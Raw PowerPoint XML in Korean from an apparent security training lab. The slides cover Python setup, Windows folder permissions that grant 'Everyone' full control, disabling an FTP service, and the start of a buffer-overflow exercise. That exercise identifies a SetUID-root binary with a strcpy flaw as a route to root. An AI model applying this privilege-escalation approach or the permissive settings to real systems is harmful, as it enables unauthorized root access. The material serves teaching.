              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>5. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>윈도우 탐색기의 주소창에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>라고 입력한 후</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>커맨드 창을 킨다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6. python_test.py </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>가 저장 되어 있는 주소를 저장한다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>밑 탐색기 주소창을 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>ctrl c </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>하면 주소가 복사된다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a: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7. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>명령 프롬프트</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>“cd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>를 입력하고 마우스 오른쪽 키를 누르면</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>방금 주소가 복사된다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>최종 입력은 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>“cd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" err="1"/>
              <a:t>빈폴더</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t> 주소</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>%” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>가</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>된다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>후 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>“python python_test.py” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>를 입력한다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t> </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8.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>“helloworld”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t> 가 정상적으로 출력되었으면 환경설치 완료</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="100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ko-KR" altLang="en-US" sz="1000"/>
              <a:t>“추가</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>(D)..." </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="100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a:t>“선택할 개체 이름을 입력하십시오</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>예제</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>)(E)."</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>'Everyone' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>입력 후 ”이름 확인</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>(C)" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>버튼 클릭</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicPeriod" startAt="6"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="100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8. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t> “모든 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" err="1"/>
              <a:t>권한”에</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t> 대해 “허용” 클릭 후 “확인” 버튼 클릭</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> </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9.  "navy06 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="100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a:t>1.  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>명령 프롬프트 실행 후 ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>check’ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>입력 및 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" err="1"/>
              <a:t>키코드</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t> 획득</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="379447259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/Training/Unit/Sys/7</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> 7. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="4400" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>FTP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="4400" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>서비스 설정</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FTP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20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Windows 2012</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="100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(FTP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>확인</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>) Windows </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>키 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>+ R </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>키를 동시에 눌러 실행 다이얼로그 팝업 및 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>입력</a:t>
            </a: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r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>로컬 호스트 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>FTP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>접속 시도</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" altLang="ko-KR" sz="1000"/>
              <a:t>C:\User\Administrator&gt;ftp localhost</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="pt-BR" altLang="ko-KR" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="pt-BR" altLang="ko-KR" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="pt-BR" altLang="ko-KR" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="pt-BR" altLang="ko-KR" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="pt-BR" altLang="ko-KR" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="pt-BR" altLang="ko-KR" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="pt-BR" altLang="ko-KR" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="pt-BR" altLang="ko-KR" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" altLang="ko-KR" sz="1000"/>
              <a:t>                      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>※ FTP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>접속 가능함을 확인</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" altLang="ko-KR"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a:t>Ctrl + C </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>입력하여 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>FTP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>종료</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicPeriod" startAt="3"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicPeriod" startAt="3"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicPeriod" startAt="3"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicPeriod" startAt="3"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicPeriod" startAt="3"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicPeriod" startAt="3"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicPeriod" startAt="3"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>(FTP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>비활성화</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>) “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="100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a:t>5. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>“관리 도구” 선택</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7.  “Microsoft FTP Service" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>더블 클릭</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR"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8.  “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>시작 유형</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>(E):"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>를 ”사용 안 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" err="1"/>
              <a:t>함“으로</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t> 변경 및 ”중지</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>(T)" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>버튼 클릭</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>9.  “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="100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a:t>(FTP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>재확인</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>명령 프롬프트를 통해 로컬 호스트 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>FTP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>접속 시도</a:t>
            </a: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a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>                               ※ FTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>에 접속 불가함을 확인</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicPeriod" startAt="11"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>bye </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>입력으로 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>FTP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>종료</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="100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a:t>“명령 프롬프트” 실행 후 ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>check’ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>입력 및 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" err="1"/>
              <a:t>키코드</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t> 획득</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>check</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="100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/Training/Unit/Sys/8</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> 8. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="4400" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>Buffer Overflow </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="4400" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>공격 및 방어</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bar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="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/sec </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>디렉터리로 이동</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>$ cd /sec</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>2) /sec/bof64 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>파일의 속성 확인</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>$ ls –l bof64</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SetUID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>가 설정되어 있고</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>소유자가 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>임을 알 수 있음 ⇒ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>root </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>권한으로 실행 가능</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>2) /sec/bof64.c </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>소스 파일 확인</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>$ vim bof64.c</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foo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>함수에서 버퍼 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>오버플로우</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(BOF) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>취약점을 가진 함수</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>가 사용됨을 확인</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>※ bar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>함수에서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>root </a:t>
            </a:r>
            <a:r>
